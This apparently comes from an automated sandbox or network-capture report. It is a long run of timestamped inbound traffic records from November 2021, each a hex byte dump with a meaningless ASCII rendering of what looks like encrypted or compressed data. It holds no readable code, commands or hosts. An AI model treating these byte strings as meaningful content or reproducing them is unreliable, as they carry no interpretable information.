                                              2021-11-29 10:29:51 UTC157INData Raw: 07 25 88 1f af f3 61 c0 dc ca cf b8 ef 4d 18 bd ed 94 a9 0b 55 2d 90 c0 9e 98 e6 ca 1f 48 18 90 14 d4 3a 9f ee 27 09 d5 96 84 8f d0 f4 28 b6 3a b0 36 a8 61 94 3c 3d 51 7d 62 88 ee 5e 6d 5b 02 ff 09 0b 3c c3 b1 de ff 61 e8 89 e4 15 68 f2 12 70 35 0d 7f 35 e6 8f 3a df ae 11 f6 57 92 c7 f6 5b b4 1b 84 10 ec ee 82 80 c5 3a 44 0e 77 5e e5 7d a6 c4 2e bc ac a8 d2 b6 80 10 d8 99 18 d9 f8 5c e0 0b cc 14 0a 31 2e 24 a5 df ec 45 65 92 12 32 ac 45 4c e5 0d 96 b3 c1 a5 f4 d1 b9 41 b6 b4 6b 95 4f 40 fc 31 bd 6d 10 25 1e 64 af e0 30 27 af 20 14 2b 84 5b 47 63 fa 10 87 a3 ec d1 05 a4 e2 97 fd 97 f7 8a 01 7d 67 23 11 85 f3 98 77 c7 a8 8b 90 75 fa 43 5d 8e 71 23 2b 78 00 7a 1a a9 b9 77 fb e5 a6 21 29 79 3a 83 b1 e3 30 49 93 53 db be 89 eb 61 cc cf 9c 00 03 8f 11 45 50 2d
                                              Data Ascii: %aMU-H:'(:6a<=Q}b^m[<ahp55:W[:Dw^}.\1.$Ee2ELAkO@1m%d0' +[Gc}g#wuC]q#+xzw!)y:0ISaEP-
                                              2021-11-29 10:29:51 UTC159INData Raw: 17 36 62 73 68 b0 ff eb d5 9d 88 93 68 96 f6 9c c0 0e 9f f4 29 fb 3d c1 0b 03 2b ad 85 0c 74 7d 24 54 cd 54 3a 92 69 7e 0a 67 84 76 66 8f a4 89 b7 87 de f5 cd cf c8 af 04 b1 b0 be d3 0c 06 a6 8d 83 6f 49 3f c3 53 b2 55 fc 61 d5 da a5 34 6e d1 51 37 81 ff fe 07 b5 e4 f8 29 72 78 5d 2e 00 0d 52 52 ce 1d ac b8 45 0e 4d ba ac 55 84 1b 5b 7c 28 60 26 be 90 a7 03 1a 44 1a 78 1c d9 54 40 51 5c 59 23 a2 50 38 ee 29 38 61 dc b9 82 26 bc be e3 12 0f 25 c9 b5 2a f4 29 25 7c bd 5b cf 01 c2 73 83 1c 88 69 6c 46 ef 46 b4 45 4d a2 c1 62 dd c4 07 e1 85 76 bc ee 10 75 0e 1c cf 76 4b db 4b ea d8 71 50 6e 5e b8 a2 86 b8 11 87 f1 ef 8b d2 50 c5 f5 2c f7 c5 ed 5a a3 90 f9 4d 45 36 11 e2 b4 e1 87 63 73 82 52 f1 a6 a6 5d 94 82 23 0f f4 00 f2 be df 4f d5 b6 78 ec 48 34 c8 0d 09
                                              Data Ascii: 6bshh)=+t}$TT:i~gvfoI?SUa4nQ7)rx].RREMU[|(`&DxT@Q\Y#P8)8a&%*)%|[silFFEMbvuvKKqPn^P,ZME6csR]#OxH4
                                              2021-11-29 10:29:51 UTC160INData Raw: d0 9a ce b1 de fb 14 50 c3 47 02 30 83 91 cb 95 7a 1d 53 9f d1 10 c1 10 7e 2c 79 e7 26 32 69 ee f9 36 b1 83 f8 89 f1 42 a8 68 14 26 b3 42 ec 07 6b 13 59 6e af f2 57 39 ed f0 ac bb 14 c9 02 bd 86 92 3f f0 5b 58 65 1a cb bc d2 f8 4f 74 81 65 67 48 54 aa ae 90 08 5d 19 88 0e 94 d5 47 d0 e0 9a 52 12 2f e3 9d 52 fc 18 5a 5e ba 5e 77 ce 88 7d ec 27 57 11 d6 76 41 22 c7 9b 15 2d f7 dc 10 dc ad 28 63 61 02 27 7e d1 5b 26 b4 38 89 b0 33 09 cb 0e 1b 7c 25 46 f4 a0 dd 7c d7 66 56 e9 ed 66 39 55 b5 81 f3 03 3c 93 8c fa c0 91 cb ca 23 a7 6f 1e 51 50 fe f0 8f 2b 1f 72 87 98 8b fd c7 e3 cc 71 e3 78 c3 9e 37 59 53 80 d8 55 28 2f cf 27 6f 3c 47 01 a5 d6 62 44 f7 86 29 5a 31 1b de 7b 0b da 50 63 ae 2f d5 50 f1 ec 91 b6 58 ee 63 4d 2b bb c9 9a f1 b7 fb 4d 39 53 05 d6 82 14
                                              Data Ascii: PG0zS~,y&2i6Bh&BkYnW9?[XeOtegHT]GR/RZ^^w}'WvA"-(ca'~[&83|%F|fVf9U<#oQP+rqx7YSU(/'o<GbD)Z1{Pc/PXcM+M9S
                                              2021-11-29 10:29:51 UTC161INData Raw: 2e 47 6c 97 ba 90 ea 41 17 39 32 c6 8b 10 f6 4c 1d 51 fa 64 5a bf 8e 05 92 13 42 1f f7 76 03 c6 1c 9a a9 09 ba a5 6d c1 02 c7 65 5b 4b 54 78 ed 0d db 52 1b 77 7a f4 70 11 49 f0 6d b4 31 1b e5 03 b1 17 b2 04 d5 41 98 7b ea cf 04 8a 31 43 d2 67 61 7f 2b 05 1a eb 9f 25 28 5f 35 b3 c9 b2 5d 1f 58 4d 4a ce 10 34 6b a7 75 cc 79 88 a6 2f 21 f3 e1 fb eb ab 34 a2 6f c3 57 f4 7f a7 46 f3 ee 92 dd c8 3a 5f e3 d1 e4 e1 2d 91 96 dd 27 51 2b 24 ca 45 72 06 d9 e9 0b d1 b2 fd a3 ee a5 79 0c b1 17 08 93 19 bc 79 37 53 fc 55 f6 5b e1 06 13 3d 28 39 e7 b3 86 e4 dc 4e f3 30 42 b7 42 3e 07 4f 39 0c 92 36 38 ab 40 67 ff 41 be 7f f1 bc 87 b7 af 24 45 56 c5 f7 0a 93 84 08 f4 80 53 92 44 41 6e 70 68 99 e8 12 fa ce 12 f0 38 4a cd 49 df 19 60 55 6f 00 2a 6e bf a7 49 fe f7 bd 3a f4
                                              Data Ascii: .GlA92LQdZBvme[KTxRwzpIm1A{1Cga+%(_5]XMJ4kuy/!4oWF:_-'Q+$Eryy7SU[=(9N0BB>O968@gA$EVSDAnph8JI`Uo*nI:
                                              2021-11-29 10:29:51 UTC162INData Raw: d7 0b 84 46 53 e5 06 96 3e ff b6 f2 73 d1 38 d8 98 6a 44 a1 09 2c b6 42 32 f9 09 52 a0 cb 9a e3 5b c8 f0 5c ee 49 43 ed 85 ce d6 3b 25 2f 13 87 1e 6d 5d 12 45 82 5e 51 da 5a 01 1b a9 55 66 1e a3 eb a1 f7 73 33 11 23 f7 ea 3e ee 7a 2e 27 d7 16 35 c3 a2 25 a2 7e 00 7c cb 43 23 fa 6c d8 94 66 96 ba 79 da 32 ec 40 62 33 5c 10 dc 3f fe 76 2e 41 42 c8 54 0e 62 fa 1e c8 2e 01 c9 21 b0 1f 90 1e d1 5f 5d 89 1e 37 ef 64 fe f0 29 93 86 9a 96 f8 b0 17 5e c5 9b e6 8e 54 30 7e e3 b9 ed f3 af 91 50 2a 5f d9 59 aa 17 ed 8d 49 44 99 ca ce cd d2 1a c7 42 bd 24 84 1e f2 39 86 9e 95 a8 99 3f 6d c7 f7 89 9b 03 d9 d9 ef 14 61 16 12 fd 71 33 08 dd ef 04 c9 bd fa c7 a4 c5 01 31 87 72 79 94 00 be 7e 9c 9e a1 15 98 29 e3 12 17 a9 2a 7d b4 85 89 f9 ab 0c 8a 5a 33 d9 7f 68 18 52 20
                                              Data Ascii: FS>s8jD,B2R[\IC;%/m]E^QZUfs3#>z.'5%~|C#lfy2@b3\?v.ABTb.!_]7d)^T0~P*_YIDB$9?maq31ry~)*}Z3hR
                                              2021-11-29 10:29:51 UTC163INData Raw: 62 39 83 85 80 51 00 c7 e4 9c 9d 29 63 9c dc 87 a9 fe 84 20 99 34 e5 5b 12 f7 c6 d8 bd 17 13 fd a3 a4 55 db b0 cd 61 ea 72 df 82 09 51 1d 8e cc 8c 2c 29 f9 f8 5b c9 69 24 83 dc 68 94 f8 8c 39 eb 08 ea eb 50 25 f2 68 a2 a1 7b e1 a4 c7 c7 b5 8e 4e 3d 40 24 23 84 e6 9b d0 c4 ea 7e 19 19 13 f0 72 e6 aa ea 52 e9 7b 8d f3 e9 3a 1c fe 25 bd a0 db 3c 77 98 af ce a8 55 0d 31 71 8d 90 9a 21 ba af aa a4 3e 6d 32 03 39 5c 22 8e fd f4 0b ab 7e b5 58 ab ed a1 f3 2f 0d c6 d3 30 ed 0d d4 d9 fe 77 53 ea a3 94 75 ab 26 87 d1 7c 4f 88 e7 bf 7e 94 c7 4e 47 43 4f 63 fb 29 25 1a 2b 54 de 4c 0a 51 29 e0 97 44 04 5f bf a3 65 1c bc 6b b9 3f 6f 7d 24 34 fc 90 3f a4 80 4e 7f 45 b6 08 1d 56 90 eb 4b d6 68 9c 88 e9 cb 5a 41 24 2a e0 b2 f6 1f 05 d5 02 74 c6 1e b1 fd a1 29 24 0f a0 bd
                                              Data Ascii: b9Q)c 4[UarQ,)[i$h9P%h{N=@$#~rR{:%<wU1q!>m29\"~X/0wSu&|O~NGCOc)%+TLQ)D_ek?o}$4?NEVKhZA$*t)$
                                              2021-11-29 10:29:51 UTC164INData Raw: 96 c4 01 31 18 77 79 f4 71 bc af 30 93 a0 17 bb 57 e3 43 18 2d 2a 60 e0 67 89 77 89 5d fe 28 5a c5 19 1b 18 db 23 c0 90 cc 16 80 7d 4c d2 9b 86 58 92 87 a9 54 85 92 75 5d db fe 06 b8 82 17 ec ef 7b 6e 25 ba 60 b4 40 3a 0a 8f 04 25 fa 19 c7 1f 67 38 3c e9 82 a5 99 b4 d4 9f 48 43 d6 9c 05 d2 c2 03 2a 2d b8 f7 e9 d0 86 96 59 26 b5 74 a7 ec b7 dc 50 e2 23 50 40 ce 8b 09 0f 0e c8 f3 c0 1b 9e db 2e d3 31 4d 5f ff 73 ab 77 9c d2 10 93 18 fe 57 4b 1f 4b 08 98 76 0b 4f 88 4e 88 f3 b1 e7 70 dd da 60 14 bb d7 4d 6b 58 30 45 f0 00 c5 ae 88 fd 89 bd f6 81 ec b1 96 5e 2c a9 dc 1f 17 ac 4b 31 03 a9 37 0b 18 49 71 85 da ea 89 46 23 b3 20 d3 e7 1a e8 d5 8a db 23 2f 08 80 ca 0d 42 d7 12 6b fe 86 41 33 a3 ff 86 59 2b 2f 02 e0 b2 fe 1e 87 c9 28 02 df 55 bc f9 74 24 e1 e2 9b
                                              Data Ascii: 1wyq0WC-*`gw](Z#}LXTu]{n%`@:%g8<HC*-Y&tP#P@.1M_swWKKvONp`MkX0E^,K17IqF# #/BkA3Y+/(Ut$
                                              2021-11-29 10:29:51 UTC166INData Raw: 01 7f d0 93 29 62 f2 8a 73 e8 cd af 74 92 7c f7 47 86 f4 06 f0 ae e5 2f d2 f9 12 88 c7 d9 7d d4 b1 13 06 3f 1d 98 fc a6 d5 b3 b8 df f8 f9 ff ee 67 33 f4 9a 5b 96 5a d8 4d 04 31 9f 5d 19 65 92 b2 7d fa e0 6f b4 54 7d 73 d9 0e b1 71 96 e4 d5 46 d1 3e 74 7f a6 18 ef 0a 5f 3f 86 78 df db 6f 54 c1 4e db 87 77 2e 42 6c ae 1d 27 c8 1f ba a1 11 23 7d 2e c6 cd 93 65 1d f7 cd 94 a2 30 9e a5 c5 3b fa 71 5a 56 ef 8d b7 c1 7f 7f 43 ee b2 d1 fa 7e 7f bc 14 7c db b4 17 9d f7 9c d9 b7 7b f7 be e7 2a d6 b8 64 bd eb 78 ff 4f 39 bd e5 7c 43 b5 db c5 7e 69 7e d7 43 8e 1d c5 f5 0b f1 ee 5f b3 a2 3c 83 af 73 fb 25 b2 2a f9 ec 9f 03 9d 49 3c 28 d3 ba bb 60 95 43 56 df f3 e7 01 a5 b0 c7 fd db 53 f8 d1 bf a9 a5 fd 7e 7d 11 33 3f ed be 8e 30 df fe 61 b5 31 ac f0 b1 a3 6a d0 28 dc
                                              Data Ascii: )bst|G/}?g3[ZM1]e}oT}sqF>t_?xoTNw.Bl'#}.e0;qZVC~|{*dxO9|C~i~C_<s%*I<(`CVS~}3?0a1j(
                                              2021-11-29 10:29:51 UTC167INData Raw: 36 02 5c 16 1a d0 56 f9 44 eb 50 76 52 1f f5 62 c5 42 3f df 55 62 6e f7 0b dc 9b a8 9d c0 40 b6 ae 2a 3b f0 f7 b7 31 bc 6c 77 e9 f5 0c 1d 8a 66 3e 1d 03 a7 d4 98 05 1f e7 af 31 bd 32 74 82 90 67 2b 6a 22 a6 f4 c8 25 94 17 68 09 f7 00 6b 5b 96 6e 6b 27 2e f8 ec 4e 18 bb d2 bd 5d 0b 19 34 4c 2b 8a 54 09 0d 0e 0b 86 31 0a d7 db 89 b0 f3 a9 6b c4 bb 74 d7 c1 a4 e0 67 30 2f 8b 3e d5 13 75 22 f1 e2 55 51 e4 9e ce 45 27 37 e5 42 ba e5 4a 7f af 00 ce 7f e8 c5 b3 88 9f d6 66 70 15 82 94 95 8c 99 df 68 6b 69 1b 1a 5c e0 5d 96 7b 2c 67 9b 5d 29 20 f6 d0 33 cf bd 40 c9 59 9e dd be 8a 90 11 37 86 af 8c 5f 3d bc 30 dc 81 fb 71 34 2e 4e 62 5f 95 fb 86 e5 c4 a6 a9 53 db f7 86 f1 29 a2 33 f2 2c ef 0b c6 08 f2 53 47 c5 b1 e6 c8 85 1c a8 c3 0e 82 80 dd 90 7c e6 80 7f 53 6c
                                              Data Ascii: 6\VDPvRbB?Ubn@*;1lwf>12tg+j"%hk[nk'.N]4L+T1ktg0/>u"UQE'7BJfphki\]{,g]) 3@Y7_=0q4.Nb_S)3,SG|Sl
                                              2021-11-29 10:29:51 UTC168INData Raw: de be 79 57 34 bd b2 b1 1a 0d 74 00 be e4 bb ab 7e d3 07 5e 53 ba db c5 3e 92 e0 37 35 ed 25 bd b9 85 1e ac c5 c7 54 f8 72 a3 44 f6 69 95 be b9 0f 3f 77 bd 86 9b 02 d9 d9 ef 94 61 0c 32 8f 70 41 35 e3 df 2a fa 8d c9 76 9d d3 21 43 86 7d 70 e4 00 be 7e 30 1d 21 15 ad 77 91 13 0b 24 3a 7d 54 ee 89 f9 88 5f ef 28 ad b1 bf 13 09 52 bc 48 90 5c 17 82 6c 48 22 79 66 5a 83 9a e1 e3 85 01 74 5f ca fe 1b 8b 73 15 fd f2 87 d9 25 2d 61 16 51 3a f9 e2 81 25 eb 19 53 aa 67 a6 3d eb 93 a5 c8 ed aa 96 59 5e ca 28 05 4d c3 01 3b 2d 88 45 83 d9 97 8b 89 9a b5 c6 a6 e9 a6 dc 22 39 b2 59 51 d3 f7 81 0f ba c9 f6 d1 1b ec 35 74 d0 20 50 47 7d 73 12 76 9e c5 10 e1 c2 0a 5e 5a 1e 3d 97 98 cd 0a 4d 9f 4e fa eb e3 ed 62 dc b0 e6 14 00 d6 4f 7c 58 42 52 43 0a d1 af fa 7e 89 06 f7
                                              Data Ascii: yW4t~^S>75%TrDi?wa2pA5*v!C}p~0!w$:}T_(RH\lH"yfZt_s%-aQ:%Sg=Y^(M;-E"9YQ5t PG}sv^Z=MNbO|XBRC~
                                              2021-11-29 10:29:51 UTC170INData Raw: b9 af 52 a9 84 be 8f 20 87 c4 5c 8c ed 0d c6 d9 f5 61 37 c2 a2 94 ec b6 1c 34 c3 7c 83 95 b5 94 7c 80 92 6f 74 6a 5d 63 05 26 30 33 27 4c d3 47 8c 54 06 e0 e0 48 73 58 ae a3 9b 36 ed 49 09 30 8e 7b 66 07 e2 90 3c ab 84 7e 44 4e 9f 27 47 4b 96 eb f5 cc ac 86 c8 ea a6 4d 3d 31 09 e0 ac e4 2f 23 d0 02 8c de e5 8e 0a a3 34 07 3f b8 bb ec a7 d4 f5 39 95 e3 55 f1 cb ba 3e e4 98 5a 95 8e 97 5e 3b 3b 8e 0e 11 68 90 b3 7d 96 eb 62 f0 56 31 35 56 12 96 70 96 3b c0 4b d0 3f 72 21 84 30 1c 09 7a b9 89 6b dd da 6c 92 a6 06 9e 8d b5 19 7b 7c ac 1c 27 86 12 ac f9 14 18 0b e7 da ea c5 e5 6f f6 8d 89 f4 f6 6a ef 8e 59 a3 d4 c5 00 35 93 e1 41 52 69 1b b2 91 51 87 5d 6c 0a 60 fc a9 b5 53 85 b9 20 0b a2 3f cc b8 95 cd d0 ab 66 eb 78 0a 8c 06 c1 e4 40 8b 7d 66 c5 93 fe f6 6e
                                              Data Ascii: R \a74||otj]c&03'LGTHsX6I0{f<~DN'GKM=1/#4?9U>Z^;;h}bV15Vp;K?r!0zkl{|'ojY5ARiQ]l`S ?fx@}fn
                                              2021-11-29 10:29:51 UTC171INData Raw: d0 e7 c8 4a a8 4d cc 98 51 0c 4c 89 4e 88 f9 b5 55 75 2c c9 b8 14 90 dc 4e 6a 58 30 40 eb 29 f4 5f 9b 21 89 82 e5 82 ed b1 96 0e 28 db dd a4 1d 7c 4b 5e 16 aa 37 0b 18 b3 6e f7 db 6b 8d 66 22 14 34 d0 e6 1a e8 b4 8b f6 24 6e 10 bc cb 85 56 d4 12 6b fe 62 47 de a6 12 97 6a 2a c7 14 e3 b2 fe 1e e3 cd b7 00 19 57 b0 f8 ea 3d e5 e2 9b 67 2f a5 58 fb 4e 40 b7 ec ca 32 30 55 27 27 89 10 2d a5 f4 c3 82 27 60 ce 11 7a 28 7f 1d a0 3b b7 ee 9d 3f 3e f1 9f 00 58 77 c0 fd 9c ae 2c 24 ab e4 87 3a fd 90 0b 8b 34 20 7f 61 c8 0f da 26 3d 67 cd b0 a4 d0 e8 b6 e6 01 eb 19 ff bd 22 ab 00 ac d3 4b 36 3c f9 28 43 fe 62 08 83 df 44 52 e2 9e 39 50 15 18 e4 f4 21 ce 78 09 8c 01 e3 78 da d4 b5 7b 4c c7 5f 58 13 e2 c0 95 f2 86 d9 7b 19 1a 23 ad 41 ca aa 48 64 2f 61 9b f3 3d 12 b1
                                              Data Ascii: JMQLNUu,NjX0@)_!(|K^7nkf"4$nVkbGj*W=g/XN@20U''-'`z(;?>Xw,$:4 a&=g"K6<(CbDR9P!xx{L_X{#AHd/a=
                                              2021-11-29 10:29:51 UTC172INData Raw: 43 71 25 bf 0f fc 41 f6 52 83 a1 1c 28 b9 ee e0 78 e1 1a d0 5f 25 ea 6b 0a fe 01 2f ac 48 ae 41 b3 c5 bb ba f7 7f 9f 5d de 95 b1 df bd ee f6 df 56 e7 75 9d a9 75 80 2b fc 20 8a 68 a2 02 b8 13 6b a8 24 bc f0 76 aa cb 37 df f1 f9 23 61 9c c0 b0 c5 03 70 3d 8a ca ba fb fe 7b 52 7f 21 bb 3e cb 3a d8 d4 af 36 bd a5 09 eb a4 6c ad 2e c9 50 36 67 86 40 a7 e9 7d ec 98 7d 3e 8d b3 80 47 17 27 d8 be 14 95 5e 13 fd 71 45 3a fb f6 34 df 89 9b f6 b5 80 00 31 87 76 7f fc 43 a0 80 31 4f a1 21 fe 56 e3 12 1b 2b 22 09 ef 9e 88 aa 88 37 bb 29 5a b7 18 1d 10 d1 2f 8f 93 0f 17 f6 38 49 d2 6c 80 5e 9a 22 88 32 81 55 74 f7 9e ff 06 88 95 11 e4 31 5a 05 21 79 61 a2 05 3b 0a f4 07 23 f2 30 db 81 66 f3 3d 03 c7 a4 99 ee c3 99 40 6b ca 8b 05 18 c3 f5 6f 2c b8 52 ea d6 8e b1 57 d1
                                              Data Ascii: Cq%AR(x_%k/HA]Vuu+ hk$v7#ap={R!>:6l.P6g@}}>G'^qE:41vC1O!V+"7)Z/8Il^"2Ut1Z!ya;#0f=@ko,RW
                                              2021-11-29 10:29:51 UTC173INData Raw: 51 5e d8 00 bb ff db c7 b5 88 4f cf 68 57 43 a1 97 94 c2 0e d8 68 19 68 23 18 28 e1 b9 90 33 2e 7d 11 f2 2e 12 f4 d7 33 4a ba c3 d4 2e 9e 9f 34 b9 92 17 37 60 a9 cc 5c 4d 9f de dd 37 72 76 34 03 49 46 5d e1 fa 62 c7 cb b9 1b 71 a9 f6 bf f3 29 ba f8 d1 06 ed 7c c6 b5 7f 60 45 c3 b1 f2 ca c4 31 2e e2 0d 83 51 7d 97 6c 94 81 69 49 56 78 70 05 57 33 cc ad 55 ef 62 7d 30 20 b1 f0 5b 73 29 ad ad 50 34 aa 42 a7 7b a8 09 67 f9 e3 e1 3f b7 4f 7c 79 45 8e 39 7a 09 b3 6d f5 bd af 16 03 e8 ea 46 86 28 2c 92 ad cf 0b 52 d3 e6 07 c7 d9 ab fb b7 11 75 3e 89 9f 9d a4 40 3d 3b d2 e8 fb e8 ee c8 3f a7 bc 28 96 c2 5e 5c 06 30 9f 17 34 1a 91 ed 59 e2 e8 9e 39 54 7d 3e ed 0b b3 02 97 4a e4 3f d3 6b e4 38 b8 15 ed 0d 5f cb 88 ec f9 af 6f 0a 70 04 d9 86 77 10 5e 0e ad 86 03 f0
                                              Data Ascii: Q^OhWChh#(3.}.3J.47`\M7rv4IF]bq)|`E1.Q}liIVxpW3Ub}0 [s)P4B{g?O|yE9zmF(,Ru>@=;?(^\04Y9T}>J?k8_opw^
                                              2021-11-29 10:29:51 UTC175INData Raw: 3d 3a 7a 2b 06 25 fa 19 d1 c8 15 a7 63 e0 ff a5 55 31 c2 9f 48 5e c0 4b f2 4b 37 0a 57 2d a8 b2 eb d0 86 8b 4f f9 42 c0 f8 e2 ca dc 08 d8 35 50 40 d3 9a ea 7d bb 62 dc bd 1b a2 d5 2c d3 31 50 4e 11 01 13 bd b4 ae 10 77 22 e6 57 4b 1e 5f e6 6f cb 1a 46 f4 4e f8 01 b4 e7 70 dc ce 92 8b 01 5d 5f 17 58 00 bf ea 00 c5 af 9c 0b fb 07 89 a8 90 b1 2e ed 29 a9 dc 1e 03 56 bc 8c 7c 80 4a 0b ac 82 6e 85 da f7 8f 54 1e 2d 32 d1 9b 1a dc 54 8a db 23 2e 1c 96 b9 d0 9b fe 6f 6b 46 85 46 33 a3 e2 90 40 58 f2 f3 c9 cf fe 06 06 cc 28 02 c2 43 9a 0f ac 2f c8 9f 9b 0b cb a4 75 fc d9 5c 85 d0 57 08 12 28 27 a3 6d 11 33 b1 2f c7 b0 1b 7d 85 3c 07 28 03 f6 a1 f2 b5 23 e1 16 6f 99 96 01 25 77 08 17 9d 21 1d d4 bc d6 bb 9f 21 91 76 8b 80 11 7f 07 dc d4 de 14 01 02 c3 b1 d9 d0 04
                                              Data Ascii: =:z+%cU1H^KK7W-OB5P@}b,1PNw"WK_oFNp]_X.)V|JnT-2T#.okFF3@X(C/u\W('m3/}<(#o%w!!v
                                              2021-11-29 10:29:51 UTC176INData Raw: c7 3c ef 1d b3 70 00 3b 20 49 35 3d 09 39 6e 17 ef 0b 5f b9 1f 6b 7e ce 89 90 9d 05 2b 84 75 16 5e 7c 3a 1c 2d 85 f7 ae c2 17 2b 03 2a d5 cf c5 73 6f f1 9b 6c f6 cd 69 89 86 27 ac f1 c5 c1 af ad e2 a7 50 05 03 b5 b7 d5 87 78 6c 28 42 f6 be 53 51 fe a1 7c 2d b3 3f e9 b8 77 57 b8 a8 80 e9 16 0a 82 04 25 eb 65 8b d3 fd 82 84 18 f4 02 9f ca db 9f e8 f2 43 79 b8 4d 61 45 76 e0 a9 c6 85 21 a1 28 af fa ed 73 c7 b1 68 d5 24 73 f5 7c c3 c3 c9 48 be 25 54 c3 9f bd b0 2f 06 7a 00 be e4 2d ab 46 cb f0 7c 5c bb 38 c9 30 92 e0 37 a3 ed a3 b9 49 a7 11 ad 0c cb 5a f8 72 a3 d2 f6 6d 8f 4e 9b 00 3e b3 b1 8a 9b 02 d9 4f ef 24 65 fc 10 80 71 1c 38 f1 df 2a fa 1b c9 b5 86 23 03 4c 87 03 7d f6 00 be 7e a6 1d c5 11 5d 55 9e 12 8a 29 28 7d e0 b0 1f f9 99 7f 18 2a 27 b7 b5 1f 1a
                                              Data Ascii: <p; I5=9n_k~+u^|:-+*soli'Pxl(BSQ|-?wW%eCyMaEv!(sh$s|H%T/z-F|\807IZrmN>O$eq8*#L}~]U)(}*'
                                              2021-11-29 10:29:51 UTC177INData Raw: 21 87 15 3e 1f 85 9c 5e 91 c2 93 9c b3 10 d6 ba ce 87 2c e1 1d 0a 6d 36 4e 7f b3 d1 d6 d8 0c 3d b1 d0 a0 a3 36 ea d8 e6 a5 e7 6b f7 97 22 c1 1d 13 d2 ad 34 52 f9 c7 48 0c 73 22 83 75 67 14 e5 78 3b 3e 15 2c ed 40 25 e4 78 eb a9 30 e1 9e d8 ba b5 b2 40 d5 54 72 13 14 e6 9d fa 60 db 15 19 34 2c 1a 5a e0 aa 06 42 a2 63 7d f1 53 12 89 d8 31 bd bc d0 42 5f 68 a6 59 ba ef 17 a8 7f ab be 5d 3b 2a af 64 b1 1f 75 49 03 88 5e 5f 93 fb f4 72 ba ef bb b5 ab 8b bf 10 21 a0 c4 f4 15 7b 0d 25 db 15 63 38 c3 b4 9b cb b6 30 ae 55 7c 25 81 17 94 11 94 a7 60 53 6a 5d 63 93 26 3e 30 c7 56 92 62 3a 59 21 e0 e0 48 e5 58 a7 b5 3b 37 d7 42 cf 30 a9 7b 66 07 74 90 7e a8 24 7f 04 45 07 27 60 4b 96 eb 63 cc a2 91 68 eb 97 46 2d 31 2e e0 ac e4 b9 23 b8 01 6c c4 a4 ab 37 ae 13 07 3f
                                              Data Ascii: !>^,m6N=6k"4RHs"ugx;>,@%x0@Tr`4,ZBc}S1B_hY];*duI^_r!{%c80U|%`Sj]c&>0Vb:Y!HX;7B0{ft~$E'`KchF-1.#l7?
                                              2021-11-29 10:29:51 UTC178INData Raw: 18 73 3a 33 c6 f6 84 40 2a f3 95 e2 c5 ff f8 f2 b0 28 85 d6 57 9a f8 aa b3 e4 1e 9d 81 3e d8 75 55 cd 58 9d ec 72 bd 31 fc 26 c1 98 6d 33 7a 3b c3 a8 27 58 42 10 48 2f 99 0c dd f2 58 37 85 15 3e 89 13 01 8e 76 26 ec e1 21 12 c1 b8 ce 87 ba 77 91 b8 8c d2 31 02 07 ed c1 da 0c 3d 27 46 b1 d3 d2 0e a7 9b 73 b9 7c f5 97 22 57 8b ad 32 42 d0 2d 84 3f 30 1b 71 22 83 e3 f1 53 46 9c df 41 68 35 74 57 27 e4 78 7d 3f 00 c0 6c 3c c5 c8 88 f7 c2 56 72 13 82 70 94 3c 84 3f 6a 64 68 f9 0d 58 e0 aa 90 d4 2e 0a 8f 15 2c 6f f4 2b 26 bf bc d0 d4 c9 9e 57 bd 5e 90 6a 37 6e bf bc 5d 3b bc 39 dd 46 ec 91 36 7e 49 11 4b 91 fb f4 e4 2c b9 8d 50 4f f4 c2 f3 4c b4 c6 f4 15 ed 9b c6 21 e5 87 47 be b1 11 df b4 30 ae c3 ea 83 c3 f2 70 6e e9 81 c9 47 68 5d 63 05 b0 33 06 36 b2 ed 1f
                                              Data Ascii: s:3@*(W>uUXr1&m3z;'XBH/X7>v&!w1='Fs|"W2B-?0q"SFAh5tW'x}?l<Vrp<?jdhX.,o+&W^j7n];9F6~IK,POL!G0pnGh]c36
                                              2021-11-29 10:29:51 UTC179INData Raw: 05 00 27 c4 b9 ab fe d3 80 7e 3d 8a d8 cf 4f 92 5b 17 37 ed a5 bd 39 a5 a3 a8 c8 cd 25 f8 af 83 46 f6 e9 95 3e 99 3b 0f 6b b7 f5 9b fd f9 db ef 14 61 8c 12 f7 77 a3 3e 8e df 0a db 8f c9 f6 9d 53 01 2a b5 90 7b 89 00 fc 5f 32 1d a1 15 2d 57 d7 14 fd 2f 57 7d 84 91 8b f9 88 5f 68 28 c4 85 fe 19 65 52 a6 36 92 5c 17 82 eb 48 8c 6a 66 5a ef 9a 0e a2 87 01 74 5f 4d fe f8 bc 73 15 91 f2 b3 98 27 2d 61 16 d6 3a 2d f5 e1 27 87 19 2d e9 65 a6 3d eb 14 a5 12 e8 25 9d 35 5e da 69 07 4d c3 01 bc 2d c2 53 0c d2 fb 8b 77 db b7 c6 a6 e9 21 dc af 3e d2 52 3d d3 db c8 0d ba c9 f6 56 1b 32 35 cb d1 4c 50 2d 33 71 12 76 9e 45 10 a6 c4 01 55 36 1e dd c4 9a cd 0a 4d 1f 4e 51 eb 53 e5 0d dc 6d b0 16 00 d6 4f fc 58 86 54 0d 02 b8 af 5c 29 8b 06 f7 83 7b b1 ec 1f ce ab a1 1e e2
                                              Data Ascii: '~=O[79%F>;kaw>S*{_2-W/W}_h(eR6\HjfZt_Ms'-a:-'-e=%5^iM-Sw!>R=V25LP-3qvEU6MNQSmOXT\){
                                              2021-11-29 10:29:51 UTC180INData Raw: 2d 39 ef 0d c6 d9 65 61 84 c7 57 96 b4 b6 cb 82 c1 7c 83 95 67 96 06 b5 67 6d 2c 6a 40 4e 07 26 33 33 b7 54 04 66 9b 54 5e e0 df 65 71 58 ad a3 4b 35 7e 63 41 3d d6 7b 07 2a e0 90 3f ab 54 7d 65 40 68 2a 1f 4b 15 c6 f7 cc af 86 18 e9 3f 63 60 3c 51 e0 09 c9 2d 23 d3 02 1c c6 9f ae 1d a3 6c 07 f8 95 b9 ec a4 d4 25 3a ce c5 1d fc 93 ba d6 c9 9a 5a 96 8e 47 5d 76 35 79 03 49 68 99 9d 7f 96 e8 62 20 55 88 0e 0b 1f ce 70 bc 15 c2 4b d3 3f e2 39 10 10 0b 09 22 b9 c2 45 df da 6f 92 76 05 c6 b7 91 14 23 7c c1 32 25 86 11 ac 29 17 f7 05 ce d7 b2 c5 6a 41 f4 8d 8a f4 26 69 ea b4 c3 ae 8c c5 e6 81 91 e1 41 52 ee 03 fd b2 31 85 05 6c 6c 6c fe a9 b5 53 15 a1 02 1c 57 3d 94 b8 15 79 d2 ab 66 eb fd 0a c9 01 c1 e9 18 8b 53 d2 c7 93 fe f6 e9 9f fa ea 7b ea 8f 43 d8 97 dd
